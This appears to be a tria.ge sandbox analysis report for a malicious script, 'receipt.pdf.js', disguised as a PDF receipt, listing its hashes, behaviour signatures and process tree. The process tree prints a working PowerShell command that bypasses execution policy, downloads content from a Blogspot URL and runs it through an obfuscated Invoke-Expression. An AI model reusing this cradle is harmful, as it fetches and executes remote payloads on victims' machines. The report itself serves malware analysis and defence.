Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
0s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
09/01/2024, 14:55
Static task
static1
Behavioral task
behavioral1
Sample
receipt.pdf.js
Resource
win7-20231129-en
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
receipt.pdf.js
Resource
win10v2004-20231222-en
3 signatures
150 seconds
General
-
Target
receipt.pdf.js
-
Size
420KB
-
MD5
ed4a940aceec4031ec56fa375a11dc60
-
SHA1
363a4d5dcf4a5da377c8e0a776216aa2dce7548d
-
SHA256
2036c55eeff25d6200dcbf7d4b91bf4137c9829e6435a451ded924c828ec662e
-
SHA512
e39fb8d235c097de87b15cabe8df770dcd410e4d155b363074d43e80ead98535d864db6647564c819d5500fc2dd92793bf690e2a088f0feca317561f14d7f073
-
SSDEEP
96:83/QJGLDYV9vLQQQQHrmkKnQVUEyVe+4wTRwPZ8:oEfQQQQHrmkKnQVUEyVe+4wTRwPZ8
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2020 wrote to memory of 2520 2020 wscript.exe 20 PID 2020 wrote to memory of 2520 2020 wscript.exe 20 PID 2020 wrote to memory of 2520 2020 wscript.exe 20
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\receipt.pdf.js1⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm cplcpus.blogspot.com///////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 52⤵PID:2520
-